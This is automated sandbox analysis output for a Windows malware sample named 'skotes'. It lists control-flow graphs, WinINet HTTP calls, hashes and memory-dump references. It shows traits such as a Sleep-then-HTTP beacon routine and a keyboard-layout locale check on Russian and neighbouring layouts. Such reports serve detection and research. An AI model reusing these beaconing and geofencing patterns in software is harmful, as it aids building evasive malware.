                                                                                                                                                                    • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1g$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                    • API String ID: 1875963930-2018063011
                                                                                                                                                                    • Opcode ID: 4b4466ccfd8f8aa042ef8a3e5f01b7ea6bfa54869f9bab6182aa024fae2dfe76
                                                                                                                                                                    • Instruction ID: c33bb4a363be0484e58b0be695473b00cfad9152632d3e61144d3f686a0064fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b4466ccfd8f8aa042ef8a3e5f01b7ea6bfa54869f9bab6182aa024fae2dfe76
                                                                                                                                                                    • Instruction Fuzzy Hash: BFF22771A001549BEF18DB28DD89BDDBB739F81304F18829CE449A73D6DB398AC48F95
                                                                                                                                                                    Function 0061BE30 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 313networksleepfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1240 61be30-61be7c 1241 61c281-61c2a6 call 6280c0 1240->1241 1242 61be82-61be86 1240->1242 1247 61c2d4-61c2ec 1241->1247 1248 61c2a8-61c2b4 1241->1248 1242->1241 1244 61be8c-61be90 1242->1244 1244->1241 1246 61be96-61bf2a Sleep InternetOpenW InternetConnectA call 627a00 call 615c10 1244->1246 1272 61bf2c 1246->1272 1273 61bf2e-61bf4a HttpOpenRequestA 1246->1273 1253 61c2f2-61c2fe 1247->1253 1254 61c238-61c250 1247->1254 1251 61c2b6-61c2c4 1248->1251 1252 61c2ca-61c2d1 call 62d663 1248->1252 1251->1252 1258 61c34f-61c354 call 646c6a 1251->1258 1252->1247 1260 61c304-61c312 1253->1260 1261 61c22e-61c235 call 62d663 1253->1261 1255 61c323-61c33f call 62cff1 1254->1255 1256 61c256-61c262 1254->1256 1262 61c319-61c320 call 62d663 1256->1262 1263 61c268-61c276 1256->1263 1260->1258 1269 61c314 1260->1269 1261->1254 1262->1255 1263->1258 1271 61c27c 1263->1271 1269->1261 1271->1262 1272->1273 1278 61bf7b-61bfea call 627a00 call 615c10 call 627a00 call 615c10 1273->1278 1279 61bf4c-61bf5b 1273->1279 1292 61bfec 1278->1292 1293 61bfee-61c004 HttpSendRequestA 1278->1293 1280 61bf71-61bf78 call 62d663 1279->1280 1281 61bf5d-61bf6b 1279->1281 1280->1278 1281->1280 1292->1293 1294 61c035-61c05d 1293->1294 1295 61c006-61c015 1293->1295 1298 61c05f-61c06e 1294->1298 1299 61c08e-61c0af InternetReadFile 1294->1299 1296 61c017-61c025 1295->1296 1297 61c02b-61c032 call 62d663 1295->1297 1296->1297 1297->1294 1302 61c070-61c07e 1298->1302 1303 61c084-61c08b call 62d663 1298->1303 1300 61c0b5 1299->1300 1304 61c0c0-61c170 call 644250 1300->1304 1302->1303 1303->1299
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000005DC,2054CAE1,?,00000000), ref: 0061BEB8
                                                                                                                                                                    • InternetOpenW.WININET(00668DC8,00000000,00000000,00000000,00000000), ref: 0061BEC7
                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0061BEEC
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,00000000), ref: 0061BF36
                                                                                                                                                                    • HttpSendRequestA.WININET(?,00000000), ref: 0061BFF6
                                                                                                                                                                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0061C0A8
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0061C187
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0061C18F
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0061C197
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                                                    • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                    • API String ID: 2167506142-885246636
                                                                                                                                                                    • Opcode ID: 545f9c205cd2fd0420f1f42d418ddaabd8cfc03ebda316d1728f5100f6d45f9d
                                                                                                                                                                    • Instruction ID: 4b6864d673d2ef941538316c65a95dfd4ebf75236d9d7bba780c9cf669817a62
                                                                                                                                                                    • Opcode Fuzzy Hash: 545f9c205cd2fd0420f1f42d418ddaabd8cfc03ebda316d1728f5100f6d45f9d
                                                                                                                                                                    • Instruction Fuzzy Hash: C7B1E2B06001189BDB28CF28CC85BEEBB76EF45314F548198F509972C2DB719AC4CF99
                                                                                                                                                                    Function 00616020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1686 616020-61619d call 62e150 call 6280c0 * 5 RegOpenKeyExA 1699 6164b1-6164ba 1686->1699 1700 6161a3-616233 call 6440f0 1686->1700 1702 6164e7-6164f0 1699->1702 1703 6164bc-6164c7 1699->1703 1726 616239-61623d 1700->1726 1727 61649f-6164ab 1700->1727 1704 6164f2-6164fd 1702->1704 1705 61651d-616526 1702->1705 1707 6164c9-6164d7 1703->1707 1708 6164dd-6164e4 call 62d663 1703->1708 1709 616513-61651a call 62d663 1704->1709 1710 6164ff-61650d 1704->1710 1711 616553-61655c 1705->1711 1712 616528-616533 1705->1712 1707->1708 1713 6165d7-6165df call 646c6a 1707->1713 1708->1702 1709->1705 1710->1709 1710->1713 1721 616585-61658e 1711->1721 1722 61655e-616569 1711->1722 1718 616535-616543 1712->1718 1719 616549-616550 call 62d663 1712->1719 1718->1713 1718->1719 1719->1711 1723 616590-61659f 1721->1723 1724 6165bb-6165d6 call 62cff1 1721->1724 1730 61657b-616582 call 62d663 1722->1730 1731 61656b-616579 1722->1731 1733 6165b1-6165b8 call 62d663 1723->1733 1734 6165a1-6165af 1723->1734 1736 616243-616279 RegEnumValueA 1726->1736 1737 616499 1726->1737 1727->1699 1730->1721 1731->1713 1731->1730 1733->1724 1734->1713 1734->1733 1743 616486-61648d 1736->1743 1744 61627f-61629e 1736->1744 1737->1727 1743->1736 1745 616493 1743->1745 1747 6162a0-6162a5 1744->1747 1745->1737 1747->1747 1748 6162a7-6162fb call 6280c0 call 627a00 * 2 call 615d50 1747->1748 1748->1743
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0061617D
                                                                                                                                                                    • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00616271
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumOpenValue
                                                                                                                                                                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                    • API String ID: 2571532894-3963862150
                                                                                                                                                                    • Opcode ID: f473eca595b2b8feb9257ab3b09a737043e7c6d2d95aba7687c28b1bb17ed143
                                                                                                                                                                    • Instruction ID: a2ff15ce7fcb4b905b8c5650f3c0b4340e660812096551a15ce4465a1b805e82
                                                                                                                                                                    • Opcode Fuzzy Hash: f473eca595b2b8feb9257ab3b09a737043e7c6d2d95aba7687c28b1bb17ed143
                                                                                                                                                                    • Instruction Fuzzy Hash: 2DB1AF759002689BDB24DB24CC85BDEB7BAAF04340F5442D8F508E72D1DB74ABE88F95
                                                                                                                                                                    Function 00617D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1826 617d30-617db2 call 6440f0 1830 618356-618373 call 62cff1 1826->1830 1831 617db8-617de0 call 627a00 call 615c10 1826->1831 1838 617de2 1831->1838 1839 617de4-617e06 call 627a00 call 615c10 1831->1839 1838->1839 1844 617e08 1839->1844 1845 617e0a-617e23 1839->1845 1844->1845 1848 617e25-617e34 1845->1848 1849 617e54-617e7f 1845->1849 1852 617e36-617e44 1848->1852 1853 617e4a-617e51 call 62d663 1848->1853 1850 617e81-617e90 1849->1850 1851 617eb0-617ed1 1849->1851 1854 617e92-617ea0 1850->1854 1855 617ea6-617ead call 62d663 1850->1855 1856 617ed3-617ed5 GetNativeSystemInfo 1851->1856 1857 617ed7-617edc 1851->1857 1852->1853 1858 618374 call 646c6a 1852->1858 1853->1849 1854->1855 1854->1858 1855->1851 1863 617edd-617ee6 1856->1863 1857->1863 1864 618379-61837f call 646c6a 1858->1864 1867 617f04-617f07 1863->1867 1868 617ee8-617eef 1863->1868 1869 6182f7-6182fa 1867->1869 1870 617f0d-617f16 1867->1870 1872 618351 1868->1872 1873 617ef5-617eff 1868->1873 1869->1872 1876 6182fc-618305 1869->1876 1874 617f29-617f2c 1870->1874 1875 617f18-617f24 1870->1875 1872->1830 1878 61834c 1873->1878 1879 617f32-617f39 1874->1879 1880 6182d4-6182d6 1874->1880 1875->1878 1881 618307-61830b 1876->1881 1882 61832c-61832f 1876->1882 1878->1872 1883 618019-6182bd call 627a00 call 615c10 call 627a00 call 615c10 call 615d50 call 627a00 call 615c10 call 615730 call 627a00 call 615c10 call 627a00 call 615c10 call 615d50 call 627a00 call 615c10 call 615730 call 627a00 call 615c10 call 627a00 call 615c10 call 615d50 call 627a00 call 615c10 call 615730 call 627a00 call 615c10 call 627a00 call 615c10 call 615d50 call 627a00 call 615c10 call 615730 1879->1883 1884 617f3f-617f9b call 627a00 call 615c10 call 627a00 call 615c10 call 615d50 1879->1884 1889 6182e4-6182e7 1880->1889 1890 6182d8-6182e2 1880->1890 1885 618320-61832a 1881->1885 1886 61830d-618312 1881->1886 1887 618331-61833b 1882->1887 1888 61833d-618349 1882->1888 1925 6182c3-6182cc 1883->1925 1912 617fa0-617fa7 1884->1912 1885->1872 1886->1885 1893 618314-61831e 1886->1893 1887->1872 1888->1878 1889->1872 1891 6182e9-6182f5 1889->1891 1890->1878 1891->1878 1893->1872 1914 617fa9 1912->1914 1915 617fab-617fcb call 648bbe 1912->1915 1914->1915 1920 618002-618004 1915->1920 1921 617fcd-617fdc 1915->1921 1920->1925 1926 61800a-618014 1920->1926 1923 617ff2-617fff call 62d663 1921->1923 1924 617fde-617fec 1921->1924 1923->1920 1924->1864 1924->1923 1925->1869 1930 6182ce 1925->1930 1926->1925 1930->1880
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00617ED3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
